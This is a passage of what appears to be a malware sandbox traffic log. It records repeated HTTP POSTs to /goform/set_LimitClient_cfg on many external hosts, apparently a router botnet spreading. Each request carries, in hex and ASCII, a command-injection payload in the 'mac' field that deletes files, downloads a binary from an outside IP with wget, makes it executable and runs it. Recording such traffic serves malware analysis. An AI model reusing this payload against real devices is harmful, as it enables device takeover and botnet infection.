                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1036192.168.2.2345122166.169.108.1808080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443106890 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1037192.168.2.2345000107.244.111.1578080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443137884 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1038192.168.2.2357618202.69.164.08080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443154097 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1039192.168.2.233421814.56.138.1258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443177938 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1040192.168.2.2353584102.235.9.1568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443201065 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1041192.168.2.2353786190.65.212.128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443222046 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1042192.168.2.235384043.225.174.678080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443319082 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1043192.168.2.2344052188.60.114.1308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443319082 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1044192.168.2.2360074206.230.199.338080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443339109 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1045192.168.2.234067886.203.142.248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443366051 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1046192.168.2.233604674.66.104.1978080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443511963 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1047192.168.2.235507825.86.9.1368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443579912 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1048192.168.2.2340176114.220.93.1798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443682909 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1049192.168.2.235072843.120.137.1868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443708897 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1050192.168.2.234722013.6.108.1048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443738937 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1051192.168.2.2360190181.189.242.868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443758011 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1052192.168.2.2340552195.92.228.1768080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443782091 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1053192.168.2.236074686.85.57.298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443861961 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1054192.168.2.2346882212.103.233.1828080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443861961 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1055192.168.2.235864651.243.53.2048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443883896 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1056192.168.2.234071043.194.133.1198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443914890 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1057192.168.2.2356028115.196.89.2378080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443928957 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1058192.168.2.2334694188.90.28.1918080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443958044 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
